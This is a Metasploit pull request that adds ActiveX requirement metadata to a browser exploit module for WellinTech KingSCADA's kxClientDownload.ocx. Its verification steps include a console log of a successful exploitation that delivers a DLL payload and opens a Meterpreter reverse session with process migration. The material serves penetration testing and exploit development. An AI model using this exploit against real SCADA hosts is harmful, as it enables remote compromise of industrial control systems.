### PR TITLE
Resolve #5373, Add ActiveX info in BrowserRequirements

### DIFF
--- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
+++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
@@ -43,7 +43,13 @@ class Metasploit3 < Msf::Exploit::Remote
         {
           :source      => /script|headers/i,
           :os_name     => OperatingSystems::Match::WINDOWS,
-          :ua_name     => /MSIE|KXCLIE/i
+          :ua_name     => /MSIE|KXCLIE/i,
+          :activex => [
+            {
+              clsid: '{1A90B808-6EEF-40FF-A94C-D7C43C847A9F}',
+              method: 'ProjectURL'
+            }
+          ],
         },
       'Payload'        =>
         {


### PR DESCRIPTION
Resolve #5373 
## Verification
- [ ] Get a Win XP SP3 VM ready
- [ ] Start msfconsole
- [ ] `use exploit/windows/browser/wellintech_kingscada_kxclientdownload`
- [ ] `run`
- [ ] Open IE and try the exploit, it should be like this:

```
msf exploit(wellintech_kingscada_kxclientdownload) > [*] Using URL: http://0.0.0.0:8080/K721k9l
[*] Local IP: http://192.168.1.64:8080/K721k9l
[*] Server started.
[*] 192.168.1.64     wellintech_kingscada_kxclientdownload - Gathering target information.
[*] 192.168.1.64     wellintech_kingscada_kxclientdownload - Sending HTML response.
[!] 192.168.1.64     wellintech_kingscada_kxclientdownload - Exploit requirement(s) not met: activex. For more info: http://r-7.co/PVbcgx
```
- [ ] Download and install http://www.kingview.com/en/downloads/Downloads/KingSCADA3.1.rar
- [ ] Go to C:\Program Files\KingSCADA\bin\ClientLib\libs in a command prompt
- [ ] In the command prompt, do: `regsvr32 kxClientDownload.ocx`
- [ ] Try the exploit again. This time you should get:

```
msf exploit(wellintech_kingscada_kxclientdownload) > [*] Using URL: http://0.0.0.0:8080/cVwWDhe53iwldb
[*] Local IP: http://192.168.1.64:8080/cVwWDhe53iwldb
[*] Server started.
[*] 192.168.1.80     wellintech_kingscada_kxclientdownload - Gathering target information.
[*] 192.168.1.80     wellintech_kingscada_kxclientdownload - Sending HTML response.
[*] 192.168.1.80     wellintech_kingscada_kxclientdownload - Requested: /cVwWDhe53iwldb/pnsELu/
[*] 192.168.1.80     wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] 192.168.1.80     wellintech_kingscada_kxclientdownload - Requested: /cVwWDhe53iwldb/pnsELu/libs/kxClientDownloadRes1033.dll.htm
[+] 192.168.1.80     wellintech_kingscada_kxclientdownload - Sending DLL payload
[*] Sending stage (884270 bytes) to 192.168.1.80
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.80:1247) at 2015-05-20 16:31:37 -0500
[*] Session ID 2 (192.168.1.64:4444 -> 192.168.1.80:1247) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (3608)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3228
[+] Successfully migrated to process 
```
